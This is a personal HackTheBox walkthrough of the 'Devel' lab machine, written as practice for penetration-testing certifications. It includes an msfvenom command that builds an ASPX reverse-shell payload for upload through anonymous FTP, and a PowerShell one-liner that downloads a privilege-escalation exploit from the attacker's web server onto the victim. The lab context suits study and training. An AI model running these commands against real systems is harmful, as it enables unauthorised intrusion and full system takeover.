Devel HackTheBox Write up
Hello Again! My name is 0xHuey and I will be sharing my HackTheBox walk-through without Metasploit as I prepare for the GIAC GPEN and OSCP. For those that didn't read my previous post, Metasploit is an extremely powerful pentesting tool that automates a lot of the task I will be doing manually. My goal here is to learn how these tools are actually run so that I can become a better infosec enthusiast. So with that said, Lets Begin!!!
Difficulty level: Easy-ish
30mins no water break and some googling
Some background on what I am doing here.
-sV = version detection scan
-sC = runs default scripts
-v = verbose
-Pn = checks to see if the host is alive
-p- = scans all ports
-A = detailed information on scripts
-T4 = speed things up
So from the top, we see an open FTP server with looks to allow anonymous logins. Next we can see that there is a site there, because port 80 is open with http. Nmap also gives us their guess on the type of machine that it is currently running which is a Windows 8.
Being that there is a potential website I will try to see what is there. Go to the 10.10.10.5:80 site. We should be greeted with an Internet Information Services landing page. This is a Microsoft web server. If we do some further reading it looks like IIS7 shipped to windows vista and windows server 2008.
Besides this landing page I don't really see much else. So I right-click and select inspect source. After looking at the page though I also don't really see much here.
I decide to run dirb on the site to check to see if there are any hidden publicly available web pages. Do the following from your linux machine.
So my next avenue is to try the FTP Server I found. Using the anonymous login with a random password. It doesn't really matter what you type in. But for this walk-through lets stick with the following anonymous:anonymous. To invoke the ftp do the following ftp 10.10.10.5.
So once you are in run the Ls -al to list the contents of your remote directory.
Being that I am able to get into this file and see that the iisstart.htm was apart of what I found earlier. Let me see if I can upload a file to the FTP and display it on a page.
On my linux machine I am going to run the following commands cat > huey.txt and I am going to type Hello
By the time that you've created this txt file the FTP Server will have kicked you out. So don't worry and just log back in with the creds from earlier. Now after getting access, you will need to use the put command to place the file in the FTP Server. So it will be put Huey.txt or whatever you call your file. Be sure that you are in the correct file path when you log into the Server. So if you've saved the txt file to your desktop you will be in that path on your Server. So it would be /root/Desktop then login to your FTP...
After running the put command you will need to Ls -al to see if the file is actually in there.
Here is where I got a little hung and I had to do a little bit of trial/error. After doing some googling I found that Aspnet_Client is apart of the ASP.NET framework that either runs with the ASP or ASPX depending on when it was pushed.
MSFvenom is a great resource to create payloads on the fly to get access to your victim machine.
For more detailed reading on MSFvenom, check out the Offensive-Security page for a quick run down.
I found the following script that I am going to use to generate a payload. Type in the following in your correct download path msfvenom -p windows/shell_reverse_tcp LHOST=Your IP LPORT=5555 -f aspx > huey.aspx
So if you've ever used Metasploit you know that after getting a shell on a victim machine you can run the getuid command and you will privsec very easily. But if you are not using this tool then things can get a little harder.
I go back to google and start looking for a privsec exploit.
Now run a python web server from your Linux machine. This can be used on the fly to share files/data between machines.
I will now upload that code to my victim machine by using the following command with powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('hxxp://Your IP:9005/40564.exe', 'c:\root\Downloads\40564.exe')"
Now we check the download files to see if its in there.
Once I confirmed that its in there I will compile the code by running the 40564.exe command.
Boom we are in!